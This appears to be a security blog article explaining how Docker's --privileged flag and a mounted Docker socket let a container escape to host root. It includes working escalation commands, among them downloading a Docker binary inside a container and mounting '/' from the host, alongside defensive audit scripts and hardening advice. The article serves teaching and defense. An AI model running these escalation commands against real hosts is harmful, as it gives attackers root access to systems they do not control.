Every article on container or Docker security will include an exhortation to drop user and container privileges as soon as possible, or to "treat root inside the container like root outside the container". The Security page of the Docker documentation contains this gem in its Conclusions section:
"Docker containers are, by default, quite secure; especially if you run your processes as non-privileged users inside the container."
This masterfully elides the fact that Docker will run container processes as root by default. Nonetheless, this is essentially true; the Docker security page is a testament to the effort expended to design security into the Docker container runtime.
Where there are potential attacks, the Docker team will tell you how to mitigate risk. The section on the attack surface of the Docker daemon, for instance, focuses on resource sharing between hosts and guest containers and includes this warning, one of the few bolded items on the page besides section headers:
"only trusted users should be allowed to control your Docker daemon"
This is because any user on the system capable of interacting with the Docker daemon can, for example, create a new container that mounts the host root partition ("/") to an arbitrary location inside the new container:
docker run -v /:/mnt --rm -it some_container_image:latest
The user does not even need permission to read the root partition for this to succeed, because the mount is performed by the Docker daemon, which runs as root on the host so that it can do things like map ports and volumes. GTFOBins has faithfully recorded and indexed this privilege escalation trick for any aspiring hackers to try out on their target systems. The Docker security page notes that a "rootless" operating mode is available, but it requires additional configuration (i.e., it is not enabled by default) and, as of the time of writing, is still considered "experimental".
A more thorough statement regarding Docker security defaults would include this information, but a disclaimer stating that anyone with access to mount a volume into a container is effectively root sounds scary enough to make even the most ardent "move fast and break things" developer blink. As a defender, you may not even be concerned by this if the set of "users who can interact with the Docker daemon but are not already sudoers" is empty. Mitigating actions, be they technical (tightly restricting access to the docker group) or administrative (periodic user access reviews), can be taken at the host OS level to ensure unauthorized users cannot access the Docker daemon.
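As a starting point for the kind of user access review mentioned above, here is a minimal Python sketch that lists the local accounts able to reach the daemon through the socket's group. It assumes the socket group is named docker (the usual default, but configurable), and it only sees accounts that the system's name service can enumerate through pwd.getpwall(), so directory-backed users may be missing. Root is not listed unless it appears in the group, but root can reach the socket regardless.

```python
import grp
import pwd


def effective_members(group_gid, listed_members, passwd_entries):
    """Return users who belong to a group, either as listed supplementary
    members or because it is their primary group.

    passwd_entries is an iterable of (username, primary_gid) pairs.
    """
    members = set(listed_members)
    for name, primary_gid in passwd_entries:
        if primary_gid == group_gid:
            members.add(name)
    return sorted(members)


def docker_group_members(group_name="docker"):
    """List local accounts that can use the Docker socket via its group.

    Assumption: the socket's group is called "docker". Returns an empty
    list if the group does not exist on this host.
    """
    try:
        group = grp.getgrnam(group_name)
    except KeyError:
        return []
    passwd_entries = ((p.pw_name, p.pw_gid) for p in pwd.getpwall())
    return effective_members(group.gr_gid, group.gr_mem, passwd_entries)


if __name__ == "__main__":
    for user in docker_group_members():
        print(user)
```

Anyone in this list who is not also an administrator is a candidate for removal from the group.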
Where things really go awry, though, is when users move away from the default Docker settings. There are, unfortunately, two very simple and frequently suggested ways to completely negate the protection afforded by Docker's default container security measures.
The first is to run a Docker container with the --privileged flag. From the docs:
(Emphasis mine; keep it in mind for later.)
By default, Docker containers are unprivileged and cannot, for example, run a Docker daemon inside a Docker container. This is because by default a container is not allowed to access any devices, but a privileged container is given access to all devices...
By default, Docker provides a container with a set of Linux capabilities that includes SETUID, SETGID, and SYS_CHROOT, among others. This is why many security-conscious Docker instructions will have you drop all capabilities and then add back only those you need using the appropriate flags. For example, running fail2ban inside a container requires the NET_ADMIN capability so that it can modify the host's iptables rules. To enforce least privilege, you would run the container with these flags:
docker run --rm --cap-drop ALL --cap-add NET_ADMIN some_container_image:latest
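To see which capabilities a process inside a container actually holds, you can decode the CapEff bitmask from /proc/self/status. The following is a minimal Python sketch, assuming the capability numbering from the kernel's include/uapi/linux/capability.h (bits 0 to 40); any higher bit from a newer kernel is reported by number. For a root process in a container started with Docker's defaults, CapEff has commonly been 00000000a80425fb, which decodes to 14 capabilities including CAP_CHOWN, CAP_SETUID, CAP_SETGID and CAP_SYS_CHROOT; treat that specific value as version-dependent.

```python
# Linux capability names indexed by bit number (include/uapi/linux/capability.h).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID",
    "CAP_SETPCAP", "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]


def decode_caps(hex_mask):
    """Turn a hex capability mask (as shown in /proc/<pid>/status) into names."""
    mask = int(hex_mask, 16)
    names = [name for bit, name in enumerate(CAP_NAMES) if mask & (1 << bit)]
    # Bits beyond the table (capabilities added by newer kernels) are reported by number.
    for bit in range(len(CAP_NAMES), mask.bit_length()):
        if mask & (1 << bit):
            names.append(f"cap_{bit}")
    return names


def effective_caps(status_path="/proc/self/status"):
    """Read the effective capability set of the current process."""
    with open(status_path) as f:
        for line in f:
            if line.startswith("CapEff:"):
                return decode_caps(line.split()[1])
    return []


if __name__ == "__main__":
    print(effective_caps())
```

Run as root in a container started with --cap-drop ALL --cap-add NET_ADMIN, this should print only CAP_NET_ADMIN, whereas a privileged container should show every capability the kernel supports.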
But the privileged flag is different. Whereas capabilities grant individual privileged operations, --privileged gives the container all capabilities and lifts the restrictions on device access, so the container can do almost everything the host can. Why oh why would anyone choose to use this flag instead of meting out individual capabilities?
Well, it turns out that using Docker inside a Docker container is a fairly common development pattern that, up until recently, required the privileged flag. According to Jerome Petazzoni, the developer who implemented the privileged flag, Docker-in-Docker is desirable for its ability to create reproducible builds and for speeding up development, particularly in CI environments.
Thankfully, developments in the Docker ecosystem have diminished the need for the privileged flag. While it is still sometimes used to run graphical applications inside containers, Jerome notes that, as of mid-2020, the advent of Sysbox makes running nested Docker containers much safer. But at the very end of the article, Jerome mentions another way to expose Docker functions within a container: mounting the Docker socket so that processes inside the container can use it to spawn "sibling" rather than "child" containers. This is, in fact, the second very simple and frequently suggested way to absolutely torpedo your containers' security. Whereas Docker-in-Docker is most likely to be found on development machines that are not usually exposed to the Internet, mounting the Docker socket is commonly used to set up production, Internet-facing machines.
In fact, it is recommended in the Traefik quickstart, which is where I first encountered it. In the demonstration below, I don't mean to pick on Traefik: the project makes the requisite security disclosure in its documentation and provides no fewer than seven options for hardening this configuration. However, I do think it's worth adding a warning and a link to the quickstart page, because some percentage of users will inevitably read the quickstart, get Traefik working, and close the page without diving further into the docs.
Mounting the Docker socket into a container enables all sorts of mischief. For example, if the Docker socket is mounted into a container and an attacker manages to get a shell via an application exploit, the attacker can quickly gain access to the host machine using the GTFOBins trick from above. The easiest way to interact with the socket from inside the container is to download a Docker static binary and issue the command.
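The static binary is a convenience rather than a requirement: the socket serves the Docker Engine API over plain HTTP, so any process that can open it can issue the same requests the docker client does. Here is a minimal sketch using only the Python standard library, assuming the default socket path /var/run/docker.sock. It sends HTTP/1.0 requests so the daemon closes the connection after one response and the reply needs no chunked decoding; this is a simplification, not a full HTTP client.

```python
import json
import socket

DOCKER_SOCK = "/var/run/docker.sock"  # assumed default path; rootless setups differ


def build_request(method, path):
    # HTTP/1.0: one request per connection, response body ends when the socket closes.
    return f"{method} {path} HTTP/1.0\r\nHost: docker\r\n\r\n".encode("ascii")


def parse_response(raw):
    """Split a raw HTTP response into (status code, body bytes)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line = head.split(b"\r\n", 1)[0].decode("ascii")
    return int(status_line.split()[1]), body


def docker_get(path, sock_path=DOCKER_SOCK):
    """Send a GET request to the Docker Engine API over its Unix socket."""
    with socket.socket(socket.AF_UNIX, socket.SOCK_STREAM) as s:
        s.connect(sock_path)  # raises PermissionError if we may not use the socket
        s.sendall(build_request("GET", path))
        chunks = []
        while True:
            chunk = s.recv(65536)
            if not chunk:
                break
            chunks.append(chunk)
    return parse_response(b"".join(chunks))


if __name__ == "__main__":
    # GET /containers/json is the Engine API call behind "docker ps".
    status, body = docker_get("/containers/json")
    print(status)
    for container in json.loads(body):
        print(container["Id"][:12], container["Image"], container["Names"])
```

Any interpreter or tool that can open a Unix socket is therefore as good as the docker binary to an attacker.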
On the host:
/# docker run --rm -v /var/run/docker.sock:/var/run/docker.sock:ro traefik:latest
Inside the container:
/# wget https://download.docker.com/linux/static/stable/x86_64/docker-18.06.3-ce.tgz -O - > docker.tgz && tar xzvf docker.tgz
/# docker/docker run -v /:/mnt --rm -it some_container_image:latest
/# whoami
root
And that's it. Because container processes run as root by default, I could use the root-owned socket to get root on the host filesystem. Note that the read-only directive (:ro) appended to the volume flag did absolutely nothing to prevent this attack, because a read-only mount does not stop a process from connecting to the socket and sending API requests through it. By contrast, running as a non-root user and dropping unnecessary privileges inside the container will prevent, or at least substantially inhibit, an attacker trying to exploit this opening. Below, I attempt this attack inside a container I built from a recent Python image. At build time, I specified that the user inside the container should be UID 1000 instead of root. The image doesn't have wget, curl, nano or vim, but no matter: it's easy enough to download a file using a combination of bash and Python:
On the host:
/# docker run --cap-drop=ALL -v /var/run/docker.sock:/var/run/docker.sock:ro some_python_container:latest
Inside the container:
/# whoami
whoami: cannot find name for user ID 1000
/# echo 'import urllib.request
urllib.request.urlretrieve("https://download.docker.com/linux/static/stable/x86_64/docker-18.06.3-ce.tgz", "docker.tgz")
' > dock.py && python dock.py && tar xzvf docker.tgz
/# docker/docker ps
Got permission denied while trying to connect to the Docker daemon socket...
As expected, this time I got a permission denied error when attempting to enumerate the running containers. The Docker socket is owned by root and only available to users in the docker group; UID 1000 fits neither category. My attempt to chown the Docker socket (remember, CHOWN is a default Docker capability) similarly fails because I dropped all capabilities:
Inside the container:
/# chown 1000 /var/run/docker.sock
chown: changing ownership of '/var/run/docker.sock': Operation not permitted
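A defender can run the same check without the docker client at all: look for the socket inside the container and ask whether the current user could connect to it. Here is a minimal Python sketch, assuming the default socket path. Per unix(7), connecting to a Unix socket requires write permission on the socket file, so os.access(path, os.W_OK) serves as the test; note that os.access uses the real UID/GID and that root passes the check regardless of the mode bits.

```python
import os
import stat


def socket_exposure(path="/var/run/docker.sock"):
    """Report whether a Docker socket is present and usable by the current user."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"exists": False}
    return {
        "exists": True,
        "is_socket": stat.S_ISSOCK(st.st_mode),
        "owner_uid": st.st_uid,
        "group_gid": st.st_gid,
        "mode": oct(stat.S_IMODE(st.st_mode)),
        # Connecting to a Unix socket needs write permission on the socket file.
        "writable_by_me": os.access(path, os.W_OK),
    }


if __name__ == "__main__":
    print(socket_exposure())
```

In a non-root container like the one above, exists should be True but writable_by_me should be False; a root container with the socket mounted would report True for both.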
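The examples above should provide clear justification for some of the most common Docker security "best practices". In production, Internet-facing containers, it is wise to:
- avoid running containers with the --privileged flag;
- avoid mounting the Docker socket into containers;
- avoid running container processes as root, and specify a non-root user instead;
- avoid relying on Docker's default capability set, and instead drop all capabilities and add back only those you need.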
If you must do one or more of the above for whatever reason, you had better be very confident about your application security. A misconfigured Docker container will make an attacker with a foothold smile as they escalate to the host machine's root user in one well-documented command.
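To audit existing deployments for these misconfigurations (privileged mode, a mounted Docker socket, a root user, and the default capability set), the JSON emitted by docker inspect can be scanned. The following is a minimal sketch with several assumptions: it reads only the HostConfig.Privileged, HostConfig.CapDrop, Config.User and Mounts fields of docker inspect output, treats an empty User as root, assumes any named user other than root is unprivileged, and only recognizes the socket at /var/run/docker.sock or /run/docker.sock.

```python
import json
import sys

# Assumed socket locations; /var/run is normally a symlink to /run.
SOCKET_PATHS = {"/var/run/docker.sock", "/run/docker.sock"}


def audit_container(info):
    """Return findings for one object from `docker inspect` output."""
    findings = []
    host = info.get("HostConfig") or {}
    config = info.get("Config") or {}
    name = info.get("Name", "?")

    if host.get("Privileged"):
        findings.append(f"{name}: runs with --privileged")

    for mount in info.get("Mounts") or []:
        if mount.get("Source") in SOCKET_PATHS:
            findings.append(f"{name}: Docker socket mounted at {mount.get('Destination')}")

    # An empty User means the image default, which is root unless the image says otherwise.
    user = config.get("User") or ""
    if user in ("", "root", "0") or user.startswith(("root:", "0:")):
        findings.append(f"{name}: process runs as root")

    cap_drop = [c.upper() for c in host.get("CapDrop") or []]
    if "ALL" not in cap_drop:
        findings.append(f"{name}: default capability set not dropped")

    return findings


if __name__ == "__main__":
    # Example usage: docker inspect $(docker ps -q) | python audit.py
    for container in json.load(sys.stdin):
        for finding in audit_container(container):
            print(finding)
```

The empty-User heuristic can report root for an image whose Dockerfile sets a USER, so a finding is a prompt to look closer rather than proof of a problem.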